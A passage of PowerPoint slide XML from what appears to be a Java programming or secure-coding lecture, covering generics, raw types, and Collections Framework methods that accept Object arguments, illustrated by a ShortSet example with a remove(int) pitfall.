              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="1" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Raw types deprecated, but still available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Can convert between raw &amp; parameterized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>types.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18491393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Java Collections Framework </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The interfaces of the Java Collections Framework </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>use generically typed, parameterized methods, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>add(E e)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>put(K key, V value)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to insert objects into a collection or map</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>methods that accept an argument of type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> rather than a parameterized type </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>contains()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>remove()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>get()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>consequently, these methods accept an object of any type. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The collections framework interfaces were designed in this manner to maximize backwards compatibility, but this design can also lead to coding errors. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3754336921"/>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Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Programmers must ensure that arguments passed to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>such </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>methods have the same type as the parameterized type of the corresponding class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>instance. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Map&lt;K,V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Collection&lt;E&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>contains()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>remove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1775040606"/>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kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ShortSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>java.util.HashSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>public class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ShortSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  public static void main(String[] args) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HashSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;Short&gt; s = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HashSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;Short&gt;();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    for (int i = 0; i &lt; 10; i++) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s.add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s.remove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    System.out.println(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s.size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>());</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangular Callout 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="3562149"/>
            <a:ext cx="3124200" cy="952901"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -109151"/>
              <a:gd name="adj2" fmla="val -37692"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="292100" algn="l"/>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              </a:rPr>
              <a:t>Type error, does not compile.  Expecting a </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>short</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              </a:rPr>
              <a:t> but passed an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15055588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kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ShortSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
